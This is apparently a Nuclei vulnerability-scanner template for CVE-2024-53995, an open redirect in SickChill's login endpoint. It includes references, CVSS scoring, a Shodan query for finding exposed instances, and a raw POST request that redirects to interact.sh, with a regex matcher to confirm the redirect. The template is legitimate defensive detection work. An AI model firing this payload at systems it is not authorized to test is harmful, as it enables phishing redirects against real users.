CVE-2024-53995: SickChill - Open Redirect

id: CVE-2024-53995

info:
  name: SickChill - Open Redirect
  author: omarkurt
  severity: low
  description: |
    SickChill's login endpoint's 'next_' parameter accepts arbitrary content, allowing authenticated attackers to perform open redirects, but this was fixed in commit c7128a8946c3701df95c285810eb75b2de18bf82 by redirecting to a default page.
  impact: |
    Authenticated attackers can redirect users to malicious sites, potentially leading to phishing or information disclosure.
  remediation: |
    Update to the version containing commit c7128a8946c3701df95c285810eb75b2de18bf82 or later.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2024-283_GHSL-2024-291_sickchill_sickchill/
    - https://vulnerabletarget.com/VT-2024-53995
    - https://github.com/SickChill/sickchill/blob/846adafdfab579281353ea08a27bbb813f9a9872/sickchill/views/authentication.py#L33
    - https://github.com/SickChill/sickchill/commit/c7128a8946c3701df95c285810eb75b2de18bf82
    - https://github.com/SickChill/sickchill/pull/8811
    - https://nvd.nist.gov/vuln/detail/CVE-2024-53995
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2024-53995
    cwe-id: CWE-601
    epss-score: 0.00441
    epss-percentile: 0.6249
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SickChill"
  tags: cve,cve2024,redirect,sickchill

http:
  - raw:
      - |
        POST /login/?next=https://interact.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100fb0d8890e9ab46ea66fa0f91c0dc491ad5c05b6232da5ac29240b0f70986d050022100a276a812da9996e6fdc7cab2e9b34e428f48159fafffd742f588c764b238d46b:922c64590222798bb761d5b6d8e72950